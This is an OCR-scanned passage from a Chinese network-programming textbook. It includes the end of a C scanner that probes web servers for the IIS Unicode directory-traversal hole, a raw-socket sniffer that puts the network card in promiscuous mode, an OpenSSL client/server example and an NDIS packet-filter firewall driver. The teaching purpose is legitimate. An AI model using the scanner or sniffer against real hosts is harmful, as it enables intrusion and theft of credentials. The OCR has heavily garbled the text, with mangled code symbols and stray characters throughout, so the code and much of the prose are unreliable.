if(strstr(buff.fmsg)!=NULL){ /接收 到 "HTTP/1.1 200 OK"， 说 明 存 在 漏洞 
19011050000 an UNICODE-B hole in %s 95৩0, net. exB): 

) 

else printf("."): 

send(sockexC.strlen(exC).0): /发 送 第 3 个 特殊 字符 串 

Tecv(sockbuffsizeoftbufp.0): /接收 返回 的 信息 

if(strst(buff.fisg))-NULL)( /接收 到 "HTTP/1.1 200 OK"， 说 明 存 在 漏洞 
printf("nFound an UNICODE-C hole in %s 965২0", net, exC); 

) 

else printf("."); 

send(sockexD.strlen(exD).0): /发 送 第 4 个 特殊 字符 串 

recv(sock.buffsizeof(buff).0): ”// 接 收 返 回 的 信息 

if(strst(buff.fisg))-NULL)( /接收 到 "HTTP/1.1 200 OK"， 说 明 存在 漏洞 
printf("nFound an UNICODE-D hole in %s 9০90”, net, exD); 

} 

else printf("."); 

send(sock.exE.strlen(exE).0); /发 送 第 5 个 特殊 字符 串 

recv(sock.buffsizeof(buff).0): /接收 返回 的 信息 

这 strstr(bufffmsg)!=NULL){ /接收 到 "HTTP/1.1 200 OK"， 说 明 存 在 漏洞 
printf("nFound an UNICODE-E hole in %s ?os n", net, exE): 

) 


else printf("."): 

H 

else printf("Can not connect the address.\n"); // RIM 
closesocket(sock): /关闭 套 接 字 
WSACIeanup0: 1/ 终止 WS2_32.DLL 
} 
} 
return DRetCode: 
} 


扫描 结果 如 图 6-7 所 示 。 
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cixic../winnt/systen32| 


图 6-7 扫描 结果 


63 ”实现 应 用 层 网 络 嗅 探 


嗅 探 器 (SniffeD 是 一 种 常用 的 收集 有 用 数据 的 方法 ， 这 些 数据 可 以 是 用 户 的 账号 和 密 
码 , 可 以 是 一 些 商 用 机 密 数 据 等 。 嗅 探 器 可 以 作为 能 够 捕获 网 络 报 文 的 设备 ,其 定义 如 下 : 
Sniffer 是 利用 计算 机 的 网 络 接口 截获 目的 地 为 其 他 计算 机 的 数据 报 文 的 一 种 工具 。 计 算 机 
网 络 嗅 探 器 被 系统 管理 员 用 来 调试 网 络 故障 ， 而 黑客 则 可 以 用 它 窃取 计算 机 程序 在 网 络 上 
发 送 和 接收 到 的 数据 。 

网 络 嗅 探 器 可 以 在 应 用 层 用 套 接 字 API 实现 ， 也 可 以 在 内 核 层 用 网 络 协议 驱动 实现 。 
这 里 只 讨论 应 用 层 的 实现 。 

1. 嗅 探 器 原理 

普通 情况 下 , 网 卡 只 接收 目的 地 址 和 自己 有 关 的 信息 包 , 即 传输 到 本 地 主机 的 数据 包 。 
当 一 台 计 算 机 向 另 一 台 计 算 机 发 送 数 据 包 ， 事 实 上 本 局 域 网 所 有 的 计算 机 都 会 接收 到 数据 
包 ， 但 只 有 发 送 目 的 的 计算 机 会 接收 和 处 理 数据 包 ， 其 他 计算 机 会 将 该 数据 包 丢 弃 。 其 原 
理 是 使 用 数据 包 的 目的 地 址 和 网 络 适 配 卡 (NIC) 的 MAC(Media Access ControD) 地 址 比较 实 
现 的 。 当 一 个 数据 包 到 达 ， 所 有 在 网 内 的 计算 机 通过 适配器 都 能 够 发 现 这 个 数据 片 ， 其 中 
也 包括 路 由 适配器 ， 嗅 探 器 和 其 他 一 些 机 器 。 通 常 ， 适 配器 都 具有 一 块 芯片 用 来 做 结构 比 
较 的 ， 检 查 结构 中 的 目地 MAC 地 址 和 自己 的 MAC 地 址 ， 如 果 不 相 同 ， 则 适配器 会 丢弃 
这 个 结构 。 这 个 操作 会 由 硬件 来 完成 ， 所 以 ， 对 于 计算 机 内 的 程序 来 说 ， 整 个 过 程 是 毫 无 
察觉 的 。Sniffer 程序 是 把 网 络 适 配 卡 ， 如 以 太 网 卡 置 为 一 种 混杂 模式 promiscuous) 的 状态 。 

- 旦 网 卡 设置 为 这 种 模式 ， 它 就 能 使 Sniffer 程序 可 以 接收 传输 在 本 地 网 络 上 的 每 一 个 信 

息 报 。 

2. 一 个 简单 的 Sniffer 程序 实现 

程序 循环 接收 网 络 数据 包 要 占用 大 量 时 间 ， 因 此 数据 的 接收 必须 在 子 线程 中 进行 。 网 
络 数据 包 的 接收 在 线程 控制 函数 Thread0 中 实现 ， 主 要 代码 如 下 : 
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UINT Thread(LPVOID param)í 
CSnifferDlg *mys-(CSnifferDlg*)param: 
SOCKET sock: 
SOCKADDR IN addr in: 
IP ip: JP, EEFE 
TCP tcp: STOP 结构 ， 在 主 程序 定义 
char RecvBuf[BUFFER SIZE]: — :接收 数 据 包 缓冲 区 
WSADATA WSAData: 
BOOL flag = true; 
int nTimeout = 1000: 
char LocalName[16]: 
char info[300]: 
struct hostent *pHost: 
// 检查 Winsock 版 本 号 
if (WSAStartup(MAKEWORD(2, 2), &WSAData) != 0) return false: 
// 初始 化 Raw Socket, 58 1 个 参数 为 地 址 蔬 类 型 ， 用 INTERNET 类 型 
/第 2 个 参数 为 套 接 字 类 型 ， 使 用 SOCK_ RAW 可 以 绕 过 传输 层 直 接 访问 IP 层 数据 包 
/第 3 个 参数 为 协议 类 型 
if ((sock = socket(AF INET, SOCK RAW, IPPROTO RAW)) — INVALID SOCKET) 
return false: 
// 设置 IP 头 操作 选项 
if (setsockopt(sock. IPPROTO IP. IP HDRINCL. (char*)&flag, sizeof(flag)) 一 
SOCKET ERROR)return false; 
/ 获取 本 机 名 
if (gethostname((char*)LocalName, sizeof(LocalName)-1) = SOCKET ERROR) 
return false: 
/ 获取 本 地 IP 地 址 
if ((pHost = gethostbyname((char*)LocalName)) = NULL)retur false: 
addr in.sin addr = *(in addr *)pHost->h addr list[0]: //IP 
addr in.sin family = AF_INET; 
addr insin port = htons(57274); 
/ 把 sock 绑 定 到 本 地 地 址 上 
if (bind(sock. (PSOCKADDR)&addr in, sizeof(addr in) = SOCKET ERROR) 
return false: 
DWORD dwValue = 1: 
/ 设置 SOCK RAW 为 SIO_RCVALL， 以 便 接收 所 有 的 他 包 
if (ioctlsocket(sock, SIO RCVALL, &dwValue) != 0)return false; 
/循环 接收 数据 
while ( mys->StopFlag==TRUE) 
t 
int ret = recv(sock. RecvBuf. BUFFER_SIZE. 0): 
if (ret > 0) 
( 
ip -*(PSRecvBuf 
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tcp = *(TCP*)(RecvBuf + ip.HdrLen): 

sprintflinfo." 协 议 : 9eswn"mys-»GetProtocolTxt(p.Protocol)): 
mys->m Packet.AddString(info): 
sprintf(info."IP 源 地 址 : %s\r\n" inet ntoa(*(in addr*)&ip.SrcAddr)): 
mys->m Packet.AddString(info): 
sprintfünfo,"IP 目标 地 址 : — 9eswn" inet ntoa(*(in addr*)&ip.DstAddr)): 
mys->m Packet.AddString(info): 
sprintf(nfo,"TCP 源 端口 号 : *od rn" tcp.SrcPort): 
mys->m Packet.AddString(info): 
sprintfünfo,'TCP 目标 端口 号 : *edwn"tcp.DstPort): 
mys->m Packet.AddString(info): 
sprintf(nfo, (jg EI HE: 。%dwrnrnwn",ntohs(ip.TotalLen)): 
mys->m Packet.AddString(info): ) } 

return 0: 
) 


程序 首先 建立 套 接 字 ， 并 和 本 地 端口 57274 绑 定 。 程 序 的 关键 在 于 上 述 代码 中 背景 颜 
色 较 深 的 部 分 , 它 将 网 卡 设置 为 混杂 模式 才能 接收 所 有 数据 包 。 程序 运行 结果 如 图 6-8 所 示 。 
xi 
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图 6-8 捕获 的 数据 
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如 果 想 构建 一 个 简单 的 Web 客户 端 和 服务 器 对 ， 可 以 使 用 SSL. SSL(Secure Socket 
Layen) 是 一 种 架构 于 TCP 之 上 的 安全 通信 协议 , 它 可 以 有 效 地 协助 Internet 应 用 软体 提升 
通信 时 的 资料 完整 性 以 及 安全 性 。 目 前 较 常 看 到 的 应 用 就 是 SSL Web 网 站 。 如 果 在 网 络 上 
看 到 访问 的 网 页 的 url 出 现 以 “https:/” 开 头 的 字符 串 ， 那 个 s， 就 是 SSL 的 意思 。 

OpenSSL 是 套 开放 源 代码 的 SSL 套件 ， 其 函数 库 是 以 C 语言 所 编写 ， 实 现 了 基本 的 
传输 层 资料 加 密 功能 。OpenSSL 包括 3 部 分 : SSL 协议 、 密 码 算法 库 和 应 用 程序 。 密 码 算 
法 库 是 基础 , 应 用 程序 把 密码 算法 库 和 SSL 协议 应 用 于 实际 开发 中 , 也 是 丰富 的 OpenSSL 
指令 集 。OpenSSL 的 源 代码 库 可 以 从 OpenSSL 的 官方 网 站 www.openssl.org 下 载 。 利 用 该 
库 可 以 建立 一 个 SSL 通信 的 服务 器 和 客户 端 。 
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1. Windows 下 编译 OpenSSL 


Windows 下 编译 OpenSSL 需要 如 下 环境 : OpenSSL 源码 、PERL for Win32. C 编译 器 
(VC++C 等 )。 编 译 步骤 如 下 : 

(1) 访问 http://www.openssl.org/source/ 下 载 ; 

(2) 解压 缩 openssl-0.9.8e.tar.gz: 

(3) 下 载 PERL， 地 址 为 http://www.activestate.com/activeperl; 

(4) 安装 PERL; 

(5) 运行 cmd 命令 ， 在 控制 台 窗 口 ， 用 cd 命令 改变 当前 目录 的 openssl-0.9.8e 源码 所 
在 目录 ; 

(6) 执行 configure， 运 行 perl Configure VC-WIN32 - prefix=c:/openssl-0.9.8e; 

(7) 运行 ms\do_ms; 

(8) 运行 nmake-f ms\ntdll.mak， 执 行 make 进行 编译 ， 该 命令 将 OpenSSL 编译 成 动态 
库 ， 如 果 想 编译 成 静态 库 应 使 用 命令 nmake - fmsmtmak; 

(9) 运行 nmake-f ms\ntdll.mak test， 检 查 上 一 步 编译 是 否 成 功 ; 

(10) 运行 运行 nmake-f ms\ntdll.mak install”， 本 步骤 将 安装 编译 后 的 OpenSSL 移 到 指 
定 目录 ; 

(11) 编译 成 功 后 ， 打 开 c:\openssl-0.9.8e 目录 ， 将 看 到 bin\include\lib 的 3 个 文件 夹 。 

2. OpenSSL 的 应 用 结构 图 


如 图 6-9 和 6-10 所 示 分 别 是 客户 端 和 服务 端 使 用 OpenSSL 时 和 普通 的 网 络 套 接 字 应 
用 的 区 别 。 其 中 粗 框 的 是 普通 的 Socket 的 代码 。 


OpenSSL add all algorithms SSL coonectlssl) SSL nls 
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图 6-9 客户 端的 OpenSSL 
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图 6-10 服务 端的 OpenSSL 


3. 举例 在 Linux 下 应 用 OpenSSL 


(1) 服务 器 端 源 代码 如 下 : 


#include <stdio.h> 
#include <stdlib.h> 
#include <ermo.h> 
#include <string.h> 
#include <sys/types.h> 
#include <netinet/in.h> 
#include <sys/socket.h> 
#include <sys/wait.h> 
#include <unistd.h> 
#include <arpa/inet.h> 
#include <openssl/ssl.h> 
#include <openssVerr.h> 


#define MAXBUF 1024 
/*wrote by: zhoulifa(zhoulifa(?163.com) 周 立 发 (http://zhoulifa.bokee.com)*/ 
int main(int argc, char **argv) 
t 
int sockfd new_fd: 
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socklen t len: 

struct sockaddr in my addr. their addr: 
unsigned int myport, lisnum: 

char buf MAXBUF + 1]: 

SSL CTX *ctx: 


if(argv[1]) myport = atoi(argv[1]): 
else myport = 7838: 


if (argv[2]) lisnum = atoi(argv[2]): 


else lisnum = 2: 


/* SSL 库 初 始 化 */ 
SSL library init(): 
/* 载 入 所 有 SSL 算法 */ 
OpenSSL add all algorithms(): 
/* RAMH SSL 错误 消息 */ 
SSL load error strings(): 
/* 以 SSL V2 和 V3 标准 兼容 方式 产生 一 个 SSL CTX , BJ SSL Content Text */ 
ctx - SSL CTX new(SSLv23 server method()): 
/* 也 可 以 用 SSLv2 server method() 或 SSLv3 server method() 单独 表示 V2 或 V3 标准 */ 
if (ctx = NULL) í 
ERR print errors fp(stdout): 
exit(1): 
) 
/* 载 入 用 户 的 数字 证 书 ， 此 证 书 用 来 发 送 给 客户 端 。 证 书 里 包含 有 公 钥 */ 
if(SSL CTX use certificate file(ctx. argv[4]. SSL_ FILETYPE PEM) <= 0) ( 
ERR print errors fp(stdout): 
exit(1): 
) 
/* 载 入 用 户 私 钥 */ 
if(SSL CTX use PrivateKey file(ctx, argv[5], SSL FILETYPE PEM) <= 0) í 
ERR print errors fp(stdout): 
exit(1): 
) 
/* 检查 用 户 私 钥 是 否 正确 */ 
if(ISSL CTX check private key(ctx)) ( 
ERR print errors fp(stdout): 
exit(1): 
) 
/* 开启 一 个 socket 监听 */ 
if ((sockfd = socket(PF INET. SOCK_STREAM. 0)) = -1) í 
perror("socket"): 
exit(1): 


} else 
printf("socket createdn"): 
bzero(&my addr.sizeof(my addr)). 
my addr.sin family = PF INET: 
my addr.in port = htons(myport): 
if(argv[3] ^ my addrsin addr.s addr = inet addr(argv[3]): 
else my addr.sin addrs addr = INADDR. ANY: 
if (bind(sockfd, (struct sockaddr *) &my addr. sizeof(struct sockaddr)) 
=D 
perror("bind"); 
exit(1); 
} else printf("bindedin"): 
if (listen(sockfd, lisnum) = -1) í 
perror("listen"); 
exit(1); 
) ৩15 printf("begin listenn"); 
while (1) í 
SSL *ssl; 
len = sizeof(struct sockaddr): 
/* 等 待 客户 端 连 上 来 */ 


if((new fd= 
accept(sockfd, (struct sockaddr *) &their addr. 
&len)) = -1) í 
perror("accept"); 
exit(errno): 
) else 


printf("server: got connection from 96s, port ?od, socket ?odn", 


inet ntoa(their addr.sin addr), 
ntohs(their addr.sin port), new fd): 
/* 基于 ctx 产生 一 个 新 的 SSL */ 
ssl = SSL. new(ctx): 
/* 将 连接 用 户 的 socket 加 入 到 SSL */ 
SSL_set_fd(ssl, new fd): 
/* 建立 SSL 连接 */ 
if(SSL accept(ssl) — -1) í 
perror("accept"): 
close(new fd): 
break: 
) 
/* 开始 处 理 每 个 新 连接 上 的 数据 收发 */ 
bzero(buf MAXBUF + 1): 
strcpy(buf. "server->client"): 
/* 发 消息 给 客户 端 */ 
len = SSL write(ssl. buf, strlen(buf)): 
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if (len — 0) ( 

printf 

("消息 '%s' 发 送 失 败 ! 错误 代码 是 %d， 错 误 信 息 是 '%s\n". 
buf. errno, strerror(ermo)); 

goto finish; 
} else 

printf(" 消 息 '%s' 发 送 成 功 ， 共 发 送 了 %d 个 字 节 ! n", 

buf len); 


bzero(buf MAXBUF + 1): 
/* 接收 客户 端的 消息 */ 
len = SSL read(ssl. buf, MAXBUF): 
if (len ৯০) 
printf(" 接 收 消息 成 功 :'%s'， 共 %d 个 字 节 的 数据 m" 
buf len): 
else 
printf 
("消息 接收 失败 ! 错误 代码 是 "od， 错 误 信息 是 %sn'" 
ermo, strerror(ermo)): 
/* 处 理 每 个 新 连接 上 的 数据 收发 结束 */ 
finish: 
/* 关闭 SSL 连接 */ 
SSL shutdown(ssl): 
/* 释放 SSL */ 
SSL free(ssl): 
/* 关闭 socket */ 
close(new fd): 


/* 关闭 监听 的 socket */ 
close(sockfd): 

/* 释放 CTX */ 

SSL CTX free(ctx); 
return 0: 


D 客户 端 源 代码 如 下 : 
#include <stdio.h> 
#include <string.h> 
#include <ermo.h> 
#include <sys/socket.h> 
#include <resolv.h> 
#include <stdlib.h> 
#include <netinet/in.h> 
#include <arpa/inet.h> 
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#include <unistd.h> 
#include <openssl/ssl.h> 
#include <openssl/err.h> 


#define MAXBUF 1024 


void ShowCerts(SSL * ssl) 
{ 

X509 *cert; 

char *line; 


cert = SSL get peer certificate(ssl): 
if (cert != NULL) í 
printft" 数 字 证 书信 息 :m'; 
line =X509 NAME oneline(X509 get subject name(cert), 0. 0); 
printf" 证 书 : %s\n", line); 
free(line): 
line = X509 NAME oneline(X509 get issuer name(cert), 0. 0): 
printf" 颁 发 者 : %s\n", line): 
free(line): 
X509 free(cert): 
) else 
Printf" 无 证 书信 息 ! এ"): 
人 
*wrote by: zhoulifa(zhoulifa@163.com) 周 立 发 (http://zhoulifa.bokee.com)*/ 
int main(int argc, char **argv) 
{ 
int sockfd, len: 
struct Sockaddr in dest; 
char buffer[MAXBUF + 1]: 
SSL_CTX *ctx; 
SSL *ssl; 
if (argc != 3) ( 
printf" 参 数 格式 错误 ! n) 
exit(0): 
) 
/* SSL 库 初始 化 ， 参 看 ssl-serverc 代码 */ 
SSL library init0: 
OpenSSL add all algorithms(): 
SSL load error strings(): 
Ctx = SSL CTX new(SSLv23 client method()): 
if(ctx — NULL) ( 
ERR print errors fp(stdout): 
exit(1): 
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) 

/* 创建 一 个 socket 用 于 tcp 通信 */ 

if ((sockfd = socket(AF INET, SOCK STREAM. 0)) < 0) í 
perror("Socket''): 
exit(errno); 

) 

printf("socket created\n"); 

/* 初始 化 服务 器 端 (对 方 ) 的 地 址 和 端口 信息 */ 

bzero(&dest, sizeof(dest)): 

destsin family = AF INET: 

dest.sin port = htons(atoi(argv[2])): 

if (inet_aton(argv[1]. (struct in addr *) &dest.sin addr.s addr) — 0) 


perror(argv[1]): 
exit(errno): 
) 
printf("address createdn"): 
/* 连接 服务 器 */ 
if (connect(sockfd, (struct sockaddr *) &dest, sizeof(dest)) != 0) ( 
perror("Connect "); 
exit(errno): 
) 


printf("server connected"); 

/* 基于 ctx 产生 一 个 新 的 SSL */ 

ssl= SSL_new(ctx); 

SSL set fd(ssl, sockfd): 

/* 建立 SSL 连接 */ 

if(SSL connect(ssl) = -1) ERR print errors fp(stderr): 

else ( 
printf("Connected with %s encryption", SSL get cipher(ssl)): 
ShowcCerts(ssl): 

} 

/* 接收 对 方 发 过 来 的 消息 ， 最 多 接收 MAXBUF 个 字 节 */ 

bzero(buffer, MAXBUF + 1): 

/* 接收 服务 器 来 的 消息 */ 

len = SSL read(ssl, buffer, MAXBUF): 


if (len > 0) printf(" 接 收 消息 成 功 :%s'"， 共 %d 个 字 节 的 数据 m" 


buffer. len): 
else í 
printf (" 消 息 接收 失败 ! 错误 代码 是 %d， 错 误 信息 是 '%s\n", 
errno, strerror(ermo)): 
goto finish: 
) 
bzero(buffer. MAXBUF + 1): 
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strcpy(buffer. "from client-»server"): 
/* 发 消息 给 服务 器 */ 
len = SSL write(ssl buffer, strlen(buffer)): 
if (len < 0) 
printf (" 消 息 9%6s' 发 送 失败 ! 错误 代码 是 %d， 错 误 信息 是 '%s\n", 
buffer, ermo, strerror(ermo)): 
else printf" 消息 9%6s' 发 送 成 功 ， 共 发 送 了 96d 个 字 节 ! m", 
buffer. len): 
finish: 
/* 关闭 连接 */ 
SSL shutdown(ssl): 
SSL free(ssl): 
close(sockfd); 
SSL CTX free(ctx); 
return 0; 
) 


G) 编译 和 执行 程序 。 
编译 程序 用 下 列 命令 : 
gcc -Wall ssl-client.c -o client 
gcc -Wall ssl-server.c -o server 
运行 程序 用 如 下 命令 : 
Jserver 7838 1 127.0.0.1 cacert.pem privkey.pem 
client 127.0.0.1 7838 
用 下 面 这 两 个 命令 产生 上 述 cacert.pem 和 privkey.pem 文件 : 


openssl genrsa -out privkey.pem 2048 
openssl req -new -x509 -key privkey.pem -out cacert.pem -days 1095 


6.5 Passthru 应 用 于 防火 墙 


防火 增 是 最 前 线 的 网 络 安全 设备 ， 它 安装 在 网 络 节点 (路 由 器 或 者 主机 ) 上 ， 拦 截 网 络 
数据 ， 只 人 允许 符合 安全 策略 的 网 络 数据 包 进 出 ， 保 护 内 部 网 络 或 者 主机 。 防 火 南 主 要 功能 
是 包 过 滤 、 状 态 检测 、 应 用 代理 、 内 容 过 滤 。 包 过 滤 是 防火 墙 的 一 个 核心 功能 。 根 据 防 火 
堵 内 部 结构 与 协议 层 对 应 关系 ， 防 火 墙 在 ISO 七 层 模型 的 网 络 层 实现 包 过 滤 。 


1.NDIS 简介 


NDIS(Network Driver InterfaceSpecification) 是 网 络 驱动 程序 接口 规范 的 简称 。 它 横 跨 传 
输 层 、 网 络 层 和 数据 链 路 层 ， 定 义 了 网 卡 或 网 卡 驱动 程序 与 上 层 协议 驱动 程序 之 问 的 通信 
接口 规范 ， 屏 蔽 了 底层 物理 硬件 的 不 同 ， 使 上 层 的 协议 驱动 程序 可 以 和 底层 任何 型 号 的 网 
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卡通 信 。NDIS 为 网 络 驱动 程序 创建 了 一 个 完整 的 开发 环境 ， 只 需 调用 NDIS 函数 ， 而 不 用 
考虑 操作 系统 的 内 核 以 及 与 其 他 驱动 程序 的 接口 问题 ， 从 而 使 得 网 络 驱动 程序 可 以 从 与 操 
作 系 统 的 复杂 通信 中 分 离 ， 极 大 地 方便 了 网 络 驱动 程序 的 编写 。 另 外 ， 利 用 NDIS 的 封装 
特性 ， 可 以 专注 于 一 层 驱 动 的 设计 ， 减 少 了 设计 的 复杂 性 ， 同 时 易于 扩展 驱动 程序 栈 。 防 
火 墙 的 开发 一 般 采 用 的 是 中 间 驱 动 程序 。 通 过 NDIS 中 间 层 驱动 ， 可 以 截获 来 自 网 卡 的 所 
有 原始 数据 包 。 如 图 6-11 所 示 就 是 NDIS 中 间 层 驱动 的 工作 过 程 。 


DriverEntry 


传输 驱动 程 传输 驱动 程 
(比如 TCP/IP) (比如 TCP/IP) 


[Boo CO oan | 


DriverEntry | 


É 


DriverEntry 执行 前 DriverEntry 执行 后 


图 6-11 NDIS 工作 过 程 


NDIS 中 间 层 驱动 程序 是 工作 在 MINIPROT 和 PROTOCOL 接口 之 间 。 驱动 程序 必须 
向 下 导出 一 个 PROTOCOL 接口 ， 向 上 导出 一 个 MINIPORT 接口 。 将 自己 创建 的 驱动 程 
序 插 入 到 网 卡 驱 动 程序 与 传输 驱动 程序 之 间 。 因 此 ， 当 下 层 的 网 卡 驱 动 程序 接收 到 数据 后 
会 通过 MINIPORT 接口 发 送 到 导出 的 PROTOCOL 接口 上 ,NDIS 中 间 层 驱动 程序 便 接 收 
到 了 来 自 网 卡 的 数据 并 调用 准备 好 的 回调 函数 处 理 数据 包 信息 。 接 着 NDIS 中 间 层 驱动 在 
处 理 数据 包 完毕 后 再 继续 把 数据 通过 导出 的 MINIPROT 接口 向 PROTOCOL. 接口 发 送 。 
这 样 就 完成 了 一 个 截获 数据 包 的 过 程 。 

2. Passthru 实现 简单 防火 墙 


Microsoft 在 DDK 中 附带 PassThru 提供 了 一 个 中 间 层 驱动 框架 ,使 得 开发 者 能 够 相对 
容易 地 在 这 个 基础 上 实现 NDIS 中 间 层 驱动 扩展 。 下 面 将 在 PassThru 的 基础 上 实现 一 个 基 
本 的 数据 包 操作 的 扩展 。 对 于 发 送出 去 的 数据 包 处 理 ， 只 要 在 PassThru 中 的 MiniportSend 
和 MiniportSendPackets 中 加 入 必要 的 操作 代码 ， 而 对 于 接收 的 数据 包 ， 则 需要 在 
ProtocolReceive 和 ProtocolReceviePackets 中 加 入 必要 的 操作 代码 。 

基于 NDIS 的 程序 分 为 应 用 程序 、 驱 动 程序 以 及 两 者 的 通信 三 大 部 分 。 
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(D 基于 NDIS 中 间 层 的 驱动 程序 
该 程序 运行 于 内 核 态 ， 主 要 有 以 下 功能 模块 : 
O 网 络 封包 截获 ， 在 数据 链 路 层 和 网 络 层 之 间 捕 获 所 有 接收 到 的 封包 ; 
© 网 络 封包 过 滤 ， 根 据 过 滤 规则 ， 决 定 每 一 个 封包 的 行为 (放行 或 丢弃 )， 
ও) 网 络 封包 发 送 ， 将 用 户 构造 的 封包 发 送 至 网 络 中 。 
Q) 应 用 层 管理 程序 
应 用 程序 主要 起 着 控制 驱动 程序 行为 的 作用 ， 主 要 有 以 下 功能 模块 : 
CD 封包 解析 ， 对 底层 的 封包 进行 分 析 ; 
© 驱动 设置 ， 控 制 驱 动 的 行为 ， 如 缓冲 数量 、 过 滤 规 则 等 ; 
ও) 封包 构造 ， 构 造 任意 数据 包 ， 并 控制 驱动 程序 发 送 该 封包 。 
(3) 驱动 程序 与 应 用 程序 之 间 的 通信 
最 常用 的 方法 是 CreateFile( 打 开 了 驱动 设备 )、DeviceloControl( 发 送信 息 和 接收 返回 信 
CloseHandle( 关 闭 设备 )。 
主要 的 步骤 如 下 : 
CD 注册 发 送 和 接收 数据 包 的 回调 函数 。 
首先 必须 在 驱动 程序 中 向 系统 注册 导出 虚拟 接口 。 这 些 工作 将 在 DriverEntry 函数 中 完 
成 ， 代 码 如 下 : 
NDIS HANDLE NdisWrapperHandle: 
DriverEntry(IN PDRIVER OBJECT DriverObject. IN PUNICODE STRING RegistryPath) 
t 
NDIS_STATUS Status: 
NDIS PROTOCOL CHARACTERISTICS PChars: ”// 保 存 有 关 导 出 PROTOCOL 接口 的 
回调 函数 地 址 的 结构 
NDIS MINIPORT CHARACTERISTICS MChars; /保存 有 关 导 出 MINIPORT 接口 的 回 
调 函数 地 址 的 结构 
PNDIS CONFIGURATION PARAMETER Param: 
NDIS STRING Name: 
NdisMlnitializeWrapper(&NdisWrapperHandle, DriverObject, RegistryPath, NULL); /初始 化 
NdisWrapperHandle 
/设置 其 他 的 回调 函数 
MChars.SendPacketsHandler = MPSendPackets: // 设 置 发 送 数据 包 的 回调 函数 
// 向 NDIS 注册 我 们 的 MINIPORT 接口 
Status = 
NdisIMRegisterLayeredMiniport(NdisWrapperHandle.&MChars.sizeof(MChars).&DriverHandle); 
PChars.ReceivePacketHandler = PtReceivePacket; /设置 接收 数据 包 的 回调 函数 
/向 NDIS 注册 MINIPORT 接口 
NdisRegisterProtocol(&Status.&ProtHandle.&PChars. 


© 


sizeof(NDIS_PROTOCOL_CHARACTERISTICS)); 
/通知 NDIS 生成 所 注册 的 2 个 接口 
NdisIMAssociateMiniport(DriverHandle, ProtHandle): 


) 
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由 此 可 知 ， 驱 动 程序 可 以 看 成 是 工作 在 网 卡 层 与 协议 层 之 间 了 ， 当 底层 网 卡 有 数据 到 
来 时 会 先 经 过 驱动 程序 处 理 后 再 往 上 层 设备 发 送 。 那 么 就 可 以 在 回调 函数 中 处 理 来 自 网 络 
的 数据 了 。 

© 回调 函数 的 工作 。 

在 向 系统 注册 的 回调 函数 中 ， 比 较 重要 的 是 PtReceivePacket 和 PtReceivePacket 函数 。 
下 面 的 代码 演示 如 何 拦截 接收 到 的 数据 包 。 


INT PtReceivePacket( 
IN NDIS HANDLE ProtocolBindingContext., 
IN PNDIS PACKET Packet 
) 

{ 
PADAPT pAdapt =(PADAPT)ProtocolBindingContext 
NDIS STATUS Status; 
PNDIS PACKET MyPacket: 
BOOLEAN Remaining: 

/添加 代码 

int PacketSize: 


PUCHAR pPacketContent: 
PUCHAR 19৫ 


UINT BufLength; 
MDL *pNext; 
UINT i 

NDIS PHYSICAL ADDRESS HighestAcceptableAddress; 
UINT ICMP = 1: /ICMP 数据 报 规则 
UINT IGMP = 0: [IGMP 数据 报 规则 
UINT TCP- 0: //TCP 数据 报 规则 
UINT UDP = 0: //UDP 数据 报 规则 


HighestAcceptableAddress.QuadPart = -1: 
NdisQueryPacket( Packet. NULL.NULL.NULL.&PacketSize): 
Status= NdisAllocateMemory( &pPacketContent 2000, 0.HighestAcceptableAddress): 
if(Status-NDIS STATUS SUCCESS ) retum Status; 
NdisZeroMemory (pPacketContent, 2000): 
NdisQueryBufferSafe(Packet-»Private.Head, &pBuf, &BufLength, 32 ): 
NdisMoveMemory(pPacketContent, pBuf, BufLength): 
i- BufLength: 
pNext = Packet--Private.Head: 
for(::) 
{ 
if(pNext = Packet->Private. Tail) 
break: 
pNext =pNext->Next: /指针 后 移 
if(pNext — NULL) 
break: 
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NdisQueryBufferSafe(pNext.&pBuf &Bufl ength.32): 
NdisMoveMemory(pPacketContent+i.pBuf.BufLength): 
HH=BufLength: 
// 规 则 判断 
if (CMP = 1) 
{ 
这 ((char *)pPacketContent)[12] = 8 && 
((char *)pPacketContent)[13] = 0 && 
((char *)pPacketContent)[23] = 1) 
{ 
DbgPrint("ICMP 781") 
NdisFreeMemory(pPacketContent, 2000, 0): 
retum NDIS STATUS NOT. ACCEPTED: 
) 
) 
if (IGMP = 1) 
í 
这 ((char *)pPacketContent)[12] = 8 && ((char *)pPacketContent)13] = 0 && ((char 
*)pPacketContent)[23] — 2) 
{ 
DbgPrint("IGMP 8771") 
NdisFreeMemory(pPacketContent. 2000. 0): 
retum NDIS STATUS NOT ACCEPTED: 
) 
) 
if(TCP — 1) 
t 
这 ((char *)pPacketContent)[12] = 8 && ((char *)pPacketContent)[13] = 0 && ((char 
*)pPacketContent)[23] = 6) 
{ 
DbgPrint("TCP 被 拦截 !n"); 
NdisFreeMemory(pPacketContent 2000. 0): 
retum NDIS_STATUS_NOT_ACCEPTED: 
) 
) 
if (UDP = 1) 
t 
这 ((char *)pPacketContent)[12] = 8 && ((char *)pPacketContent)[13] = 0 && ((char 
*)pPacketContent)[23] 一 17) 
t 
DbgPrint("UDP 8781৩”): 
NdisFreeMemory(pPacketContent. 2000, 0): 
retum NDIS STATUS NOT ACCEPTED: 
) 
) 
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6.6 小 结 


本 章 的 重点 是 网 络 命令 的 实现 、OpenSSL 的 使 用 和 NDIS 驱动 的 原理 。 读 者 可 以 继续 
钻研 其 他 网 络 命令 的 实现 原理 。 另 外 本 章 还 介绍 到 了 网 络 攻击 的 实现 方式 。 


6.7 习题 


1. 简 述 其 他 网 络 命令 的 实现 方式 。 
2. 简 述 其 他 网 络 漏洞 及 其 攻击 原理 。 
3. 简 述 OpenSSL 的 应 用 。 

4. 简 述 Passthru 的 应 用 。 
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